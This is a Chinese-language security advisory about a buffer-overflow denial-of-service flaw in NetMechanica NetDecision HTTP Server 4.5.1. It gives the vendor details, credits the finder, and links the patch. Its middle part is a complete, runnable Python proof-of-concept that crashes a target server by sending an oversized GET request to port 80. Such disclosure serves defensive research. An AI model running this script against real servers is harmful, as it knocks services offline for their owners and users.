NetDecision HTTP Server长HTTP请求远程拒绝服务漏洞

发布日期：2012-02-29
更新日期：2012-03-01

受影响系统：
NetMechanica NetDecision 4.5.1
不受影响系统：
NetMechanica NetDecision 4.6.1
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 52208

NetDecision HTTP Server可在Windows工作站或服务器上提供标准的HTTP服务。

NetDecision HTTP服务器在处理Web请求时存在边界错误，通过超长的URL可造成栈缓冲区溢出，使受影响应用崩溃。

<*来源：Prabhu S Angadi
 
  链接：http://www.secpod.org/advisories/SecPod_Netmechanica_NetDecision_HTTP_Server_DoS_Vuln.txt
*>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Prabhu S Angadi （）提供了如下测试方法：

#!/usr/bin/python
##############################################################################
#
# Title    : Netmechanica NetDecision HTTP Server Denial Of Service 
#            Vulnerability
# Author   : Prabhu S Angadi SecPod Technologies (www.secpod.com)
# Vendor   : http://www.netmechanica.com
# Advisory : http://secpod.org/blog/?p=484
#            http://secpod.org/advisories/SecPod_Netmechanica_NetDecision_HTTP_Server_DoS_Vuln.txt
#         http://secpod.org/exploits/SecPod_Netmechanica_NetDecision_HTTP_Server_DoS_PoC.py
# Software : Netmechanica NetDecision HTTP Server version 4.5.1
# Date     : 05/12/2011
#
###############################################################################

import socket,sys,time

if len(sys.argv) < 2:
        print "\t[-] Usage: python SecPod_Netmechanica_NetDecision_HTTP_Server_DoS_PoC.py target_ip"
        print "\t[-] Example : python SecPod_Netmechanica_NetDecision_HTTP_Server_DoS_PoC.py 127.0.0.1"
        print "\t[-] Exiting..."
        sys.exit(0)

port   = 80
target = sys.argv[1]

try:
    socket.inet_aton(target)
except socket.error:
    print "Invalid IP address found ..."
    sys.exit(1)

try:
    sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    sock.connect((target,port))
except:
    print "socket() failed: Server is not running"
    sys.exit(1)

exploit = "GET "+ "A"*1276 + "\r\n" + "\r\n"

print "HTTP GET request with long filename triggers the vulnerability"
data = exploit
sock.sendto(data, (target, port))
time.sleep(5)
print "[+] Please verify the server daemon port, it must be down...."

建议：
--------------------------------------------------------------------------------
厂商补丁：

NetMechanica
------------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.netmechanica.com/products/?prod_id=1015